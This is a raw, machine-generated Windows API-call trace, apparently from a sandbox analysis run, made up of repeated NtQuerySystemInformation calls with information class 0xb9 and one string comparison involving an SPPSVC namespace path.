[0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0272.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) 